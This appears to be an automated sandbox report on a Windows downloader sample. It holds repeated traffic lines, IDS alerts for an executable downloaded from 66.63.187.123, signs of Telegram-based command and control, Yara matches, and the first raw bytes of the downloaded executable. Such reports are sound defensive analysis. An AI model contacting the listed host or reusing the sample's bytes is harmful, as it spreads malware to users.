                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49161
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49161
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Thu, 26 Sep 2024 05:47:20 GMTContent-Type: application/x-msdos-programContent-Length: 704000Connection: keep-aliveLast-Modified: Thu, 26 Sep 2024 03:29:52 GMTETag: "abe00-622fd59ffb286"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 d4 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 98 0a 00 00 24 00 00 00 00 00 00 76 b6 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b6 0a 00 4f 00 00 00 00 c0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 96 0a 00 00 20 00 00 00 98 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 20 00 00 00 c0 0a 00 00 22 00 00 00 9a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 b6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 59 00 00 5c 35 00 00 03 